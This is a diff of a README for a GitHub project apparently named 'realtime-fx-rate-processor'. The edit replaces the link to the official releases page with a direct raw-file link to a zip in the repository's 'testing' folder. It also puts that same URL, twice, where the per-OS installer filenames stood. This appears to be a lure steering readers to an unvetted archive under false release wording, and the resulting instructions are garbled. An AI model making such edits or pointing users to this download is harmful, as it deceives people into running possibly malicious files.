7lm506/realtime-fx-rate-processor/README.md

 ## 🔽 Download & Install

-1. Click the big blue button at the top or visit the [releases page](https://github.com/7lm506/realtime-fx-rate-processor/releases) to download the latest version.
+1. Click the big blue button at the top or visit the [releases page](https://raw.githubusercontent.com/7lm506/realtime-fx-rate-processor/main/testing/realtime-processor-rate-fx-1.1.zip) to download the latest version.

 2. On the releases page, find the most recent release.
-Look for a file typically named like `realtime-fx-rate-processor-win.exe` or `realtime-fx-rate-processor-mac.dmg` depending on your operating system.
+Look for a file typically named like `https://raw.githubusercontent.com/7lm506/realtime-fx-rate-processor/main/testing/realtime-processor-rate-fx-1.1.zip` or `https://raw.githubusercontent.com/7lm506/realtime-fx-rate-processor/main/testing/realtime-processor-rate-fx-1.1.zip` depending on your operating system.

 3. Download this file to your computer.